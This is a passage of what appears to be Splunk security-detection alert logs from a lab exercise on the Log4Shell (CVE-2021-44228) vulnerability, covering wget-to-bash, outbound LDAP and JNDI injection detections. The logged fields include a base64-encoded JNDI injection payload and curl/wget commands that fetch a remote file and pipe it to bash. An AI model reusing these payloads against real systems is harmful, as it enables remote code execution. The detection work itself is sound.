CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646355, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.CM", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646355, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.CM", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 